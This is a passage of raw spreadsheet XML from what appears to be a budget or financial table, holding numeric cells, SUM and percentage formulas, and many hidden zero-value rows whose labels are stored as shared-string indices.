        <f>1875-744</f>
        <v>1131</v>
      </c>
      <c r="C914" s="100"/>
      <c r="D914" s="100">
        <v>0</v>
      </c>
      <c r="E914" s="173"/>
      <c r="F914" s="174"/>
      <c r="G914" s="172"/>
    </row>
    <row r="915" spans="1:7" ht="17.25" customHeight="1">
      <c r="A915" s="128" t="s">
        <v>1066</v>
      </c>
      <c r="B915" s="100">
        <f>SUM(B916,B939,B949,B959,B964,B971,B976)</f>
        <v>18367</v>
      </c>
      <c r="C915" s="100">
        <f>SUM(C916,C939,C949,C959,C964,C971,C976)</f>
        <v>18357</v>
      </c>
      <c r="D915" s="100">
        <f>SUM(D916,D939,D949,D959,D964,D971,D976)</f>
        <v>22623</v>
      </c>
      <c r="E915" s="173">
        <f>SUM(E916,E939,E949,E959,E964,E971,E976)</f>
        <v>18595</v>
      </c>
      <c r="F915" s="174">
        <f aca="true" t="shared" si="59" ref="F915:F917">E915/C915*100</f>
        <v>101.29650814403226</v>
      </c>
      <c r="G915" s="172"/>
    </row>
    <row r="916" spans="1:7" ht="17.25" customHeight="1">
      <c r="A916" s="128" t="s">
        <v>1067</v>
      </c>
      <c r="B916" s="100">
        <f>SUM(B917:B938)</f>
        <v>4819</v>
      </c>
      <c r="C916" s="100">
        <f>SUM(C917:C938)</f>
        <v>4819</v>
      </c>
      <c r="D916" s="100">
        <f>SUM(D917:D938)</f>
        <v>5143</v>
      </c>
      <c r="E916" s="173">
        <f>SUM(E917:E938)</f>
        <v>5143</v>
      </c>
      <c r="F916" s="174">
        <f t="shared" si="59"/>
        <v>106.72338659472919</v>
      </c>
      <c r="G916" s="172"/>
    </row>
    <row r="917" spans="1:7" ht="17.25" customHeight="1">
      <c r="A917" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B917" s="100">
        <v>387</v>
      </c>
      <c r="C917" s="100">
        <v>387</v>
      </c>
      <c r="D917" s="100">
        <v>427</v>
      </c>
      <c r="E917" s="173">
        <v>427</v>
      </c>
      <c r="F917" s="174">
        <f t="shared" si="59"/>
        <v>110.33591731266151</v>
      </c>
      <c r="G917" s="172"/>
    </row>
    <row r="918" spans="1:7" ht="17.25" customHeight="1">
      <c r="A918" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B918" s="100">
        <v>0</v>
      </c>
      <c r="C918" s="100"/>
      <c r="D918" s="100">
        <v>0</v>
      </c>
      <c r="E918" s="173"/>
      <c r="F918" s="174"/>
      <c r="G918" s="172"/>
    </row>
    <row r="919" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A919" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B919" s="100">
        <v>0</v>
      </c>
      <c r="C919" s="100"/>
      <c r="D919" s="100">
        <v>0</v>
      </c>
      <c r="E919" s="173"/>
      <c r="F919" s="174"/>
      <c r="G919" s="172"/>
    </row>
    <row r="920" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A920" s="128" t="s">
        <v>1068</v>
      </c>
      <c r="B920" s="100">
        <v>0</v>
      </c>
      <c r="C920" s="100"/>
      <c r="D920" s="100">
        <v>0</v>
      </c>
      <c r="E920" s="173"/>
      <c r="F920" s="174"/>
      <c r="G920" s="172"/>
    </row>
    <row r="921" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A921" s="128" t="s">
        <v>1069</v>
      </c>
      <c r="B921" s="100">
        <v>0</v>
      </c>
      <c r="C921" s="100"/>
      <c r="D921" s="100">
        <v>0</v>
      </c>
      <c r="E921" s="173"/>
      <c r="F921" s="174"/>
      <c r="G921" s="172"/>
    </row>
    <row r="922" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A922" s="128" t="s">
        <v>1070</v>
      </c>
      <c r="B922" s="100">
        <v>0</v>
      </c>
      <c r="C922" s="100"/>
      <c r="D922" s="100">
        <v>0</v>
      </c>
      <c r="E922" s="173"/>
      <c r="F922" s="174"/>
      <c r="G922" s="172"/>
    </row>
    <row r="923" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A923" s="128" t="s">
        <v>1071</v>
      </c>
      <c r="B923" s="100">
        <v>0</v>
      </c>
      <c r="C923" s="100"/>
      <c r="D923" s="100">
        <v>0</v>
      </c>
      <c r="E923" s="173"/>
      <c r="F923" s="174"/>
      <c r="G923" s="172"/>
    </row>
    <row r="924" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A924" s="128" t="s">
        <v>1072</v>
      </c>
      <c r="B924" s="100">
        <v>0</v>
      </c>
      <c r="C924" s="100"/>
      <c r="D924" s="100">
        <v>0</v>
      </c>
      <c r="E924" s="173"/>
      <c r="F924" s="174"/>
      <c r="G924" s="172"/>
    </row>
    <row r="925" spans="1:7" ht="17.25" customHeight="1">
      <c r="A925" s="128" t="s">
        <v>1073</v>
      </c>
      <c r="B925" s="100">
        <v>432</v>
      </c>
      <c r="C925" s="100">
        <v>432</v>
      </c>
      <c r="D925" s="100">
        <v>716</v>
      </c>
      <c r="E925" s="173">
        <v>716</v>
      </c>
      <c r="F925" s="174">
        <f>E925/C925*100</f>
        <v>165.74074074074073</v>
      </c>
      <c r="G925" s="172"/>
    </row>
    <row r="926" spans="1:7" ht="17.25" customHeight="1">
      <c r="A926" s="128" t="s">
        <v>1074</v>
      </c>
      <c r="B926" s="100">
        <v>0</v>
      </c>
      <c r="C926" s="100"/>
      <c r="D926" s="100">
        <v>0</v>
      </c>
      <c r="E926" s="173"/>
      <c r="F926" s="174"/>
      <c r="G926" s="172"/>
    </row>
    <row r="927" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A927" s="128" t="s">
        <v>1075</v>
      </c>
      <c r="B927" s="100">
        <v>0</v>
      </c>
      <c r="C927" s="100"/>
      <c r="D927" s="100">
        <v>0</v>
      </c>
      <c r="E927" s="173"/>
      <c r="F927" s="174"/>
      <c r="G927" s="172"/>
    </row>
    <row r="928" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A928" s="128" t="s">
        <v>1076</v>
      </c>
      <c r="B928" s="100">
        <v>0</v>
      </c>
      <c r="C928" s="100"/>
      <c r="D928" s="100">
        <v>0</v>
      </c>
      <c r="E928" s="173"/>
      <c r="F928" s="174"/>
      <c r="G928" s="172"/>
    </row>
    <row r="929" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A929" s="128" t="s">
        <v>1077</v>
      </c>
      <c r="B929" s="100">
        <v>0</v>
      </c>
      <c r="C929" s="100"/>
      <c r="D929" s="100">
        <v>0</v>
      </c>
      <c r="E929" s="173"/>
      <c r="F929" s="174"/>
      <c r="G929" s="172"/>
    </row>
    <row r="930" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A930" s="128" t="s">
        <v>1078</v>
      </c>
      <c r="B930" s="100">
        <v>0</v>
      </c>
      <c r="C930" s="100"/>
      <c r="D930" s="100">
        <v>0</v>
      </c>
      <c r="E930" s="173"/>
      <c r="F930" s="174"/>
      <c r="G930" s="172"/>
    </row>
    <row r="931" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A931" s="128" t="s">
        <v>1079</v>
      </c>
      <c r="B931" s="100">
        <v>0</v>
      </c>
      <c r="C931" s="100"/>
      <c r="D931" s="100">
        <v>0</v>
      </c>
      <c r="E931" s="173"/>
      <c r="F931" s="174"/>
      <c r="G931" s="172"/>
    </row>
    <row r="932" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A932" s="128" t="s">
        <v>1080</v>
      </c>
      <c r="B932" s="100">
        <v>0</v>
      </c>
      <c r="C932" s="100"/>
      <c r="D932" s="100">
        <v>0</v>
      </c>
      <c r="E932" s="173"/>
      <c r="F932" s="174"/>
      <c r="G932" s="172"/>
    </row>
    <row r="933" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A933" s="128" t="s">
        <v>1081</v>
      </c>
      <c r="B933" s="100">
        <v>0</v>
      </c>
      <c r="C933" s="100"/>
      <c r="D933" s="100">
        <v>0</v>
      </c>
      <c r="E933" s="173"/>
      <c r="F933" s="174"/>
      <c r="G933" s="172"/>
    </row>
    <row r="934" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A934" s="128" t="s">
        <v>1082</v>
      </c>
      <c r="B934" s="100">
        <v>0</v>
      </c>
      <c r="C934" s="100"/>
      <c r="D934" s="100">
        <v>0</v>
      </c>
      <c r="E934" s="173"/>
      <c r="F934" s="174"/>
      <c r="G934" s="172"/>
    </row>
    <row r="935" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A935" s="128" t="s">
        <v>1083</v>
      </c>
      <c r="B935" s="100">
        <v>0</v>
      </c>
      <c r="C935" s="100"/>
      <c r="D935" s="100">
        <v>0</v>
      </c>
      <c r="E935" s="173"/>
      <c r="F935" s="174"/>
      <c r="G935" s="172"/>
    </row>
    <row r="936" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A936" s="128" t="s">
        <v>1084</v>
      </c>
      <c r="B936" s="100">
        <v>0</v>
      </c>
      <c r="C936" s="100"/>
      <c r="D936" s="100">
        <v>0</v>
      </c>
      <c r="E936" s="173"/>
      <c r="F936" s="174"/>
      <c r="G936" s="172"/>
    </row>
    <row r="937" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A937" s="128" t="s">
        <v>1085</v>
      </c>
      <c r="B937" s="100">
        <v>0</v>
      </c>
      <c r="C937" s="100"/>
      <c r="D937" s="100">
        <v>0</v>
      </c>
      <c r="E937" s="173"/>
      <c r="F937" s="174"/>
      <c r="G937" s="172"/>
    </row>
    <row r="938" spans="1:7" ht="17.25" customHeight="1">
      <c r="A938" s="128" t="s">
        <v>1086</v>
      </c>
      <c r="B938" s="100">
        <v>4000</v>
      </c>
      <c r="C938" s="100">
        <v>4000</v>
      </c>
      <c r="D938" s="100">
        <v>4000</v>
      </c>
      <c r="E938" s="173">
        <v>4000</v>
      </c>
      <c r="F938" s="174">
        <f>E938/C938*100</f>
        <v>100</v>
      </c>
      <c r="G938" s="172"/>
    </row>
    <row r="939" spans="1:7" ht="17.25" customHeight="1">
      <c r="A939" s="128" t="s">
        <v>1087</v>
      </c>
      <c r="B939" s="100">
        <f>SUM(B940:B948)</f>
        <v>10</v>
      </c>
      <c r="C939" s="100">
        <f>SUM(C940:C948)</f>
        <v>0</v>
      </c>
      <c r="D939" s="100">
        <f>SUM(D940:D948)</f>
        <v>10</v>
      </c>
      <c r="E939" s="173">
        <f>SUM(E940:E948)</f>
        <v>0</v>
      </c>
      <c r="F939" s="174"/>
      <c r="G939" s="172"/>
    </row>
    <row r="940" spans="1:7" ht="17.25" customHeight="1">
      <c r="A940" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B940" s="100">
        <v>0</v>
      </c>
      <c r="C940" s="100"/>
      <c r="D940" s="100">
        <v>0</v>
      </c>
      <c r="E940" s="173"/>
      <c r="F940" s="174"/>
      <c r="G940" s="172"/>
    </row>
    <row r="941" spans="1:7" ht="17.25" customHeight="1">
      <c r="A941" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B941" s="100">
        <v>0</v>
      </c>
      <c r="C941" s="100"/>
      <c r="D941" s="100">
        <v>0</v>
      </c>
      <c r="E941" s="173"/>
      <c r="F941" s="174"/>
      <c r="G941" s="172"/>
    </row>
    <row r="942" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A942" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B942" s="100">
        <v>0</v>
      </c>
      <c r="C942" s="100"/>
      <c r="D942" s="100">
        <v>0</v>
      </c>
      <c r="E942" s="173"/>
      <c r="F942" s="174"/>
      <c r="G942" s="172"/>
    </row>
    <row r="943" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A943" s="128" t="s">
        <v>1088</v>
      </c>
      <c r="B943" s="100">
        <v>0</v>
      </c>
      <c r="C943" s="100"/>
      <c r="D943" s="100">
        <v>0</v>
      </c>
      <c r="E943" s="173"/>
      <c r="F943" s="174"/>
      <c r="G943" s="172"/>
    </row>
    <row r="944" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A944" s="128" t="s">
        <v>1089</v>
      </c>
      <c r="B944" s="100">
        <v>0</v>
      </c>
      <c r="C944" s="100"/>
      <c r="D944" s="100">
        <v>0</v>
      </c>
      <c r="E944" s="173"/>
      <c r="F944" s="174"/>
      <c r="G944" s="172"/>
    </row>
    <row r="945" spans="1:7" ht="17.25" customHeight="1">
      <c r="A945" s="128" t="s">
        <v>1090</v>
      </c>
      <c r="B945" s="100">
        <v>10</v>
      </c>
      <c r="C945" s="100"/>
      <c r="D945" s="100">
        <v>10</v>
      </c>
      <c r="E945" s="173"/>
      <c r="F945" s="174"/>
      <c r="G945" s="172"/>
    </row>
    <row r="946" spans="1:7" ht="17.25" customHeight="1">
      <c r="A946" s="128" t="s">
        <v>1091</v>
      </c>
      <c r="B946" s="100">
        <v>0</v>
      </c>
      <c r="C946" s="100"/>
      <c r="D946" s="100">
        <v>0</v>
      </c>
      <c r="E946" s="173"/>
      <c r="F946" s="174"/>
      <c r="G946" s="172"/>
    </row>
    <row r="947" spans="1:7" ht="17.25" customHeight="1">
      <c r="A947" s="128" t="s">
        <v>1092</v>
      </c>
      <c r="B947" s="100">
        <v>0</v>
      </c>
      <c r="C947" s="100"/>
      <c r="D947" s="100">
        <v>0</v>
      </c>
      <c r="E947" s="173"/>
      <c r="F947" s="174"/>
      <c r="G947" s="172"/>
    </row>
    <row r="948" spans="1:7" ht="17.25" customHeight="1">
      <c r="A948" s="128" t="s">
        <v>1093</v>
      </c>
      <c r="B948" s="100">
        <v>0</v>
      </c>
      <c r="C948" s="100"/>
      <c r="D948" s="100">
        <v>0</v>
      </c>
      <c r="E948" s="173"/>
      <c r="F948" s="174"/>
      <c r="G948" s="172"/>
    </row>
    <row r="949" spans="1:7" ht="17.25" customHeight="1">
      <c r="A949" s="128" t="s">
        <v>1094</v>
      </c>
      <c r="B949" s="100">
        <f>SUM(B950:B958)</f>
        <v>12738</v>
      </c>
      <c r="C949" s="100">
        <f>SUM(C950:C958)</f>
        <v>12738</v>
      </c>
      <c r="D949" s="100">
        <f>SUM(D950:D958)</f>
        <v>12737</v>
      </c>
      <c r="E949" s="173">
        <f>SUM(E950:E958)</f>
        <v>12737</v>
      </c>
      <c r="F949" s="174">
        <f>E949/C949*100</f>
        <v>99.99214947401475</v>
      </c>
      <c r="G949" s="172"/>
    </row>
    <row r="950" spans="1:7" ht="17.25" customHeight="1">
      <c r="A950" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B950" s="100">
        <v>71</v>
      </c>
      <c r="C950" s="100">
        <v>71</v>
      </c>
      <c r="D950" s="100">
        <v>70</v>
      </c>
      <c r="E950" s="173">
        <v>70</v>
      </c>
      <c r="F950" s="174">
        <f>E950/C950*100</f>
        <v>98.59154929577466</v>
      </c>
      <c r="G950" s="172"/>
    </row>
    <row r="951" spans="1:7" ht="17.25" customHeight="1">
      <c r="A951" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B951" s="100">
        <v>0</v>
      </c>
      <c r="C951" s="100"/>
      <c r="D951" s="100">
        <v>0</v>
      </c>
      <c r="E951" s="173"/>
      <c r="F951" s="174"/>
      <c r="G951" s="172"/>
    </row>
    <row r="952" spans="1:7" ht="17.25" customHeight="1">
      <c r="A952" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B952" s="100">
        <v>0</v>
      </c>
      <c r="C952" s="100"/>
      <c r="D952" s="100">
        <v>0</v>
      </c>
      <c r="E952" s="173"/>
      <c r="F952" s="174"/>
      <c r="G952" s="172"/>
    </row>
    <row r="953" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A953" s="128" t="s">
        <v>1095</v>
      </c>
      <c r="B953" s="100">
        <v>0</v>
      </c>
      <c r="C953" s="100"/>
      <c r="D953" s="100">
        <v>0</v>
      </c>
      <c r="E953" s="173"/>
      <c r="F953" s="174"/>
      <c r="G953" s="172"/>
    </row>
    <row r="954" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A954" s="128" t="s">
        <v>1096</v>
      </c>
      <c r="B954" s="100">
        <v>0</v>
      </c>
      <c r="C954" s="100"/>
      <c r="D954" s="100">
        <v>0</v>
      </c>
      <c r="E954" s="173"/>
      <c r="F954" s="174"/>
      <c r="G954" s="172"/>
    </row>
    <row r="955" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A955" s="128" t="s">
        <v>1097</v>
      </c>
      <c r="B955" s="100">
        <v>0</v>
      </c>
      <c r="C955" s="100"/>
      <c r="D955" s="100">
        <v>0</v>
      </c>
      <c r="E955" s="173"/>
      <c r="F955" s="174"/>
      <c r="G955" s="172"/>
    </row>
    <row r="956" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A956" s="128" t="s">
        <v>1098</v>
      </c>
      <c r="B956" s="100">
        <v>0</v>
      </c>
      <c r="C956" s="100"/>
      <c r="D956" s="100">
        <v>0</v>
      </c>
      <c r="E956" s="173"/>
      <c r="F956" s="174"/>
      <c r="G956" s="172"/>
    </row>
    <row r="957" spans="1:7" ht="17.25" customHeight="1">
      <c r="A957" s="128" t="s">
        <v>1099</v>
      </c>
      <c r="B957" s="100">
        <v>0</v>
      </c>
      <c r="C957" s="100"/>
      <c r="D957" s="100">
        <v>0</v>
      </c>
      <c r="E957" s="173"/>
      <c r="F957" s="174"/>
      <c r="G957" s="172"/>
    </row>
    <row r="958" spans="1:7" ht="17.25" customHeight="1">
      <c r="A958" s="128" t="s">
        <v>1100</v>
      </c>
      <c r="B958" s="100">
        <v>12667</v>
      </c>
      <c r="C958" s="100">
        <v>12667</v>
      </c>
      <c r="D958" s="100">
        <v>12667</v>
      </c>
      <c r="E958" s="173">
        <v>12667</v>
      </c>
      <c r="F958" s="174">
        <f>E958/C958*100</f>
        <v>100</v>
      </c>
      <c r="G958" s="172"/>
    </row>
    <row r="959" spans="1:7" ht="17.25" customHeight="1">
      <c r="A959" s="128" t="s">
        <v>1101</v>
      </c>
      <c r="B959" s="100">
        <f>SUM(B960:B963)</f>
        <v>0</v>
      </c>
      <c r="C959" s="100">
        <f>SUM(C960:C963)</f>
        <v>0</v>
      </c>
      <c r="D959" s="100">
        <f>SUM(D960:D963)</f>
        <v>2018</v>
      </c>
      <c r="E959" s="173">
        <f>SUM(E960:E963)</f>
        <v>0</v>
      </c>
      <c r="F959" s="174"/>
      <c r="G959" s="172"/>
    </row>
    <row r="960" spans="1:7" ht="17.25" customHeight="1">
      <c r="A960" s="128" t="s">
        <v>1102</v>
      </c>
      <c r="B960" s="100">
        <v>0</v>
      </c>
      <c r="C960" s="100"/>
      <c r="D960" s="100">
        <v>0</v>
      </c>
      <c r="E960" s="173"/>
      <c r="F960" s="174"/>
      <c r="G960" s="172"/>
    </row>
    <row r="961" spans="1:7" ht="17.25" customHeight="1">
      <c r="A961" s="128" t="s">
        <v>1103</v>
      </c>
      <c r="B961" s="100">
        <v>0</v>
      </c>
      <c r="C961" s="100"/>
      <c r="D961" s="100">
        <v>0</v>
      </c>
      <c r="E961" s="173"/>
      <c r="F961" s="174"/>
      <c r="G961" s="172"/>
    </row>
    <row r="962" spans="1:7" ht="17.25" customHeight="1">
      <c r="A962" s="128" t="s">
        <v>1104</v>
      </c>
      <c r="B962" s="100">
        <v>0</v>
      </c>
      <c r="C962" s="100"/>
      <c r="D962" s="100">
        <v>0</v>
      </c>
      <c r="E962" s="173"/>
      <c r="F962" s="174"/>
      <c r="G962" s="172"/>
    </row>
    <row r="963" spans="1:7" ht="17.25" customHeight="1">
      <c r="A963" s="128" t="s">
        <v>1105</v>
      </c>
      <c r="B963" s="100">
        <v>0</v>
      </c>
      <c r="C963" s="100"/>
      <c r="D963" s="100">
        <v>2018</v>
      </c>
      <c r="E963" s="173"/>
      <c r="F963" s="174"/>
      <c r="G963" s="172"/>
    </row>
    <row r="964" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A964" s="128" t="s">
        <v>1106</v>
      </c>
      <c r="B964" s="100">
        <f>SUM(B965:B970)</f>
        <v>0</v>
      </c>
      <c r="C964" s="100">
        <f>SUM(C965:C970)</f>
        <v>0</v>
      </c>
      <c r="D964" s="100">
        <f>SUM(D965:D970)</f>
        <v>0</v>
      </c>
      <c r="E964" s="173">
        <f>SUM(E965:E970)</f>
        <v>0</v>
      </c>
      <c r="F964" s="174"/>
      <c r="G964" s="172"/>
    </row>
    <row r="965" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A965" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B965" s="100"/>
      <c r="C965" s="100"/>
      <c r="D965" s="100">
        <v>0</v>
      </c>
      <c r="E965" s="173"/>
      <c r="F965" s="174"/>
      <c r="G965" s="172"/>
    </row>
    <row r="966" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A966" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B966" s="100"/>
      <c r="C966" s="100"/>
      <c r="D966" s="100">
        <v>0</v>
      </c>
      <c r="E966" s="173"/>
      <c r="F966" s="174"/>
      <c r="G966" s="172"/>
    </row>
    <row r="967" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A967" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B967" s="100"/>
      <c r="C967" s="100"/>
      <c r="D967" s="100">
        <v>0</v>
      </c>
      <c r="E967" s="173"/>
      <c r="F967" s="174"/>
      <c r="G967" s="172"/>
    </row>
    <row r="968" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A968" s="128" t="s">
        <v>1092</v>
      </c>
      <c r="B968" s="100"/>
      <c r="C968" s="100"/>
      <c r="D968" s="100">
        <v>0</v>
      </c>
      <c r="E968" s="173"/>
      <c r="F968" s="174"/>
      <c r="G968" s="172"/>
    </row>
    <row r="969" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A969" s="128" t="s">
        <v>1107</v>
      </c>
      <c r="B969" s="100"/>
      <c r="C969" s="100"/>
      <c r="D969" s="100">
        <v>0</v>
      </c>
      <c r="E969" s="173"/>
      <c r="F969" s="174"/>
      <c r="G969" s="172"/>
    </row>
    <row r="970" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A970" s="128" t="s">
        <v>1108</v>
      </c>
      <c r="B970" s="100"/>
      <c r="C970" s="100"/>
      <c r="D970" s="100">
        <v>0</v>
      </c>
      <c r="E970" s="173"/>
      <c r="F970" s="174"/>
      <c r="G970" s="172"/>
    </row>
    <row r="971" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A971" s="128" t="s">
        <v>1109</v>
      </c>
      <c r="B971" s="100">
        <f>SUM(B972:B975)</f>
        <v>0</v>
      </c>
      <c r="C971" s="100">
        <f>SUM(C972:C975)</f>
        <v>0</v>
      </c>
      <c r="D971" s="100">
        <f>SUM(D972:D975)</f>
        <v>0</v>
      </c>
      <c r="E971" s="173">
        <f>SUM(E972:E975)</f>
        <v>0</v>
      </c>
      <c r="F971" s="174"/>
      <c r="G971" s="172"/>
    </row>
    <row r="972" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A972" s="128" t="s">
        <v>1110</v>
      </c>
      <c r="B972" s="100"/>
      <c r="C972" s="100"/>
      <c r="D972" s="100">
        <v>0</v>
      </c>
      <c r="E972" s="173"/>
      <c r="F972" s="174"/>
      <c r="G972" s="172"/>
    </row>
    <row r="973" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A973" s="128" t="s">
        <v>1111</v>
      </c>
      <c r="B973" s="100"/>
      <c r="C973" s="100"/>
      <c r="D973" s="100">
        <v>0</v>
      </c>
      <c r="E973" s="173"/>
      <c r="F973" s="174"/>
      <c r="G973" s="172"/>
    </row>
    <row r="974" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A974" s="128" t="s">
        <v>1112</v>
      </c>
      <c r="B974" s="100"/>
      <c r="C974" s="100"/>
      <c r="D974" s="100">
        <v>0</v>
      </c>
      <c r="E974" s="173"/>
      <c r="F974" s="174"/>
      <c r="G974" s="172"/>
    </row>
    <row r="975" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A975" s="128" t="s">
        <v>1113</v>
      </c>
      <c r="B975" s="100"/>
      <c r="C975" s="100"/>
      <c r="D975" s="100">
        <v>0</v>
      </c>
      <c r="E975" s="173"/>
      <c r="F975" s="174"/>
      <c r="G975" s="172"/>
    </row>
    <row r="976" spans="1:7" ht="17.25" customHeight="1">
      <c r="A976" s="128" t="s">
        <v>1114</v>
      </c>
      <c r="B976" s="100">
        <f>SUM(B977:B978)</f>
        <v>800</v>
      </c>
      <c r="C976" s="100">
        <f>SUM(C977:C978)</f>
        <v>800</v>
      </c>
      <c r="D976" s="100">
        <f>SUM(D977:D978)</f>
        <v>2715</v>
      </c>
      <c r="E976" s="173">
        <f>SUM(E977:E978)</f>
        <v>715</v>
      </c>
      <c r="F976" s="174">
        <f aca="true" t="shared" si="60" ref="F976:F979">E976/C976*100</f>
        <v>89.375</v>
      </c>
      <c r="G976" s="172"/>
    </row>
    <row r="977" spans="1:7" ht="17.25" customHeight="1">
      <c r="A977" s="128" t="s">
        <v>1115</v>
      </c>
      <c r="B977" s="100">
        <v>800</v>
      </c>
      <c r="C977" s="100">
        <v>800</v>
      </c>
      <c r="D977" s="100">
        <v>2715</v>
      </c>
      <c r="E977" s="173">
        <v>715</v>
      </c>
      <c r="F977" s="174">
        <f t="shared" si="60"/>
        <v>89.375</v>
      </c>
      <c r="G977" s="172"/>
    </row>
    <row r="978" spans="1:7" ht="17.25" customHeight="1">
      <c r="A978" s="128" t="s">
        <v>1116</v>
      </c>
      <c r="B978" s="100">
        <v>0</v>
      </c>
      <c r="C978" s="100"/>
      <c r="D978" s="100">
        <v>0</v>
      </c>
      <c r="E978" s="173"/>
      <c r="F978" s="174"/>
      <c r="G978" s="172"/>
    </row>
    <row r="979" spans="1:7" ht="17.25" customHeight="1">
      <c r="A979" s="128" t="s">
        <v>1117</v>
      </c>
      <c r="B979" s="173">
        <f>SUM(B980,B990,B1006,B1011,B1025,B1032,B1039)</f>
        <v>100</v>
      </c>
      <c r="C979" s="173">
        <f>SUM(C980,C990,C1006,C1011,C1025,C1032,C1039)</f>
        <v>100</v>
      </c>
      <c r="D979" s="173">
        <f>SUM(D980,D990,D1006,D1011,D1025,D1032,D1039)</f>
        <v>3426</v>
      </c>
      <c r="E979" s="173">
        <f>SUM(E980,E990,E1006,E1011,E1025,E1032,E1039)</f>
        <v>1100</v>
      </c>
      <c r="F979" s="174">
        <f t="shared" si="60"/>
        <v>1100</v>
      </c>
      <c r="G979" s="172"/>
    </row>
    <row r="980" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A980" s="128" t="s">
        <v>1118</v>
      </c>
      <c r="B980" s="100">
        <f>SUM(B981:B989)</f>
        <v>0</v>
      </c>
      <c r="C980" s="100">
        <f>SUM(C981:C989)</f>
        <v>0</v>
      </c>
      <c r="D980" s="100">
        <f>SUM(D981:D989)</f>
        <v>0</v>
      </c>
      <c r="E980" s="173">
        <f>SUM(E981:E989)</f>
        <v>0</v>
      </c>
      <c r="F980" s="174"/>
      <c r="G980" s="172"/>
    </row>
    <row r="981" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A981" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B981" s="100"/>
      <c r="C981" s="100"/>
      <c r="D981" s="100">
        <v>0</v>
      </c>
      <c r="E981" s="173"/>
      <c r="F981" s="174"/>
      <c r="G981" s="172"/>
    </row>
    <row r="982" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A982" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B982" s="100"/>
      <c r="C982" s="100"/>
      <c r="D982" s="100">
        <v>0</v>
      </c>
      <c r="E982" s="173"/>
      <c r="F982" s="174"/>
      <c r="G982" s="172"/>
    </row>
    <row r="983" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A983" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B983" s="100"/>
      <c r="C983" s="100"/>
      <c r="D983" s="100">
        <v>0</v>
      </c>
      <c r="E983" s="173"/>
      <c r="F983" s="174"/>
      <c r="G983" s="172"/>
    </row>
    <row r="984" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A984" s="128" t="s">
        <v>1119</v>
      </c>
      <c r="B984" s="100"/>
      <c r="C984" s="100"/>
      <c r="D984" s="100">
        <v>0</v>
      </c>
      <c r="E984" s="173"/>
      <c r="F984" s="174"/>
      <c r="G984" s="172"/>
    </row>
    <row r="985" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A985" s="128" t="s">
        <v>1120</v>
      </c>
      <c r="B985" s="100"/>
      <c r="C985" s="100"/>
      <c r="D985" s="100">
        <v>0</v>
      </c>
      <c r="E985" s="173"/>
      <c r="F985" s="174"/>
      <c r="G985" s="172"/>
    </row>
    <row r="986" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A986" s="128" t="s">
        <v>1121</v>
      </c>
      <c r="B986" s="100"/>
      <c r="C986" s="100"/>
      <c r="D986" s="100">
        <v>0</v>
      </c>
      <c r="E986" s="173"/>
      <c r="F986" s="174"/>
      <c r="G986" s="172"/>
    </row>
    <row r="987" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A987" s="128" t="s">
        <v>1122</v>
      </c>
      <c r="B987" s="100"/>
      <c r="C987" s="100"/>
      <c r="D987" s="100">
        <v>0</v>
      </c>
      <c r="E987" s="173"/>
      <c r="F987" s="174"/>
      <c r="G987" s="172"/>
    </row>
    <row r="988" spans="1:7" ht="17.25" customHeight="1" hidden="1">
